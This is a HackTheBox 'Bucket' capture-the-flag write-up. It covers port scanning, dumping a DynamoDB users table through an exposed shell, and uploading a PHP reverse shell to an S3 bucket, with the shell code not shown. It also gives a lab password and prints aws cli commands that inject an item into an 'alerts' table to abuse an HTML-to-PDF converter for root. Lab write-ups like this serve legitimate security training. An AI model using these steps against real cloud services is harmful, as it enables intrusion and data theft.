# HackTheBox-Bucket ## Rustscan ``` rustscan -a 10.10.10.212 -- -A -sC -sV .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : https://discord.gg/GFrQsGy : : https://github.com/RustScan/RustScan : -------------------------------------- Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan [~] The config file is expected to be at "/root/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. Open 10.10.10.212:22 Open 10.10.10.212:80 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Did not follow redirect to http://bucket.htb/ Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Missing a closed TCP port so results incomplete Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%) No exact OS matches for host (test conditions non-ideal). ``` ## PORT 80 It's using a domain name so we are going to add that to `/etc/hosts` Notice that we don't see images , the reason behind it is that it's retreiving the image from `s3.bucket.htb` Running `dirsearch` against that If we visit `s3.bucket.htb/shell` But adding `/` makes a difference `s3.bucket.htb/shell/` Reading the documentation to list tables ``` var params = { }; dynamodb.listTables(params, function(err, data) { if (err) console.log(err, err.stack); // an error occurred else console.log(data); // successful response }); ``` We have a found a table name `users` , to view the data from the table ``` var params = { TableName:"users"}; docClient.scan(params, (error, result) => { if (error) { console.log('error', error); } else { console.log(result.Items); // x items } }); ``` Tried using these credentials through ssh but failed Also running wfuzz on `http://s3.bucket.htb/shell/` didn't returned anything intersting So after spending so much time I realized tha I could also list the tables using `aws cli` We needed to setup the credentials and the region first also to note that our end point url will be `http://s3.bucket.htb` We can view the tables from here as well Honestly did not know what I was doing until I ran aws s3 ls again Here we can see index.html , if we visit `s3.bucket.htb/adserver/index.html`, it will be the same as `bucket.htb` so this means if we upload a php reverse shell on the bucket which is `adserver` we can access that from `bucket.htb` That reverse shell is uploaded also keep it my mind to access that quickly because s3 bucket is going to remove it We can switch user to `roy` with the password `n2vM-<_K_Q:.Aa2` also if we look for open ports we can find port 8000 is running as http so we can do port forwarding with `chisel` On our machine On target machine We can also find `bucket-app` in /var/www Looking at `index.php` it's using dynamodb client to iterate contents of `alerts` table and then reading it and storing it to a pdf using `pd4ml` which converts html and css to pdf So we need to create a table first ``` aws dynamodb create-table \ --table-name alerts \ --attribute-definitions \ AttributeName=title,AttributeType=S \ AttributeName=data,AttributeType=S \ --key-schema \ AttributeName=title,KeyType=HASH \ AttributeName=data,KeyType=RANGE \ --provisioned-throughput \ ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url 'http://s3.bucket.htb' ``` Now we need to insert the data ``` aws dynamodb put-item \ --table-name alerts \ --item '{ "title": {"S": "Ransomware"}, "data": {"S": "
"} }' \ --return-consumed-capacity TOTAL --endpoint-url http://s3.bucket.htb ``` Now doing a POST request with `action=get_alerts` `curl --data "action=get_alerts" -X POST http://127.0.0.1:8000` Note : The converted pdf file will get removed also the table so you need to be quick here to get the file I started a python http server And we got the root flag , although I was able to get the private ssh key but couldn't make it in a proper format so I just left having a root hash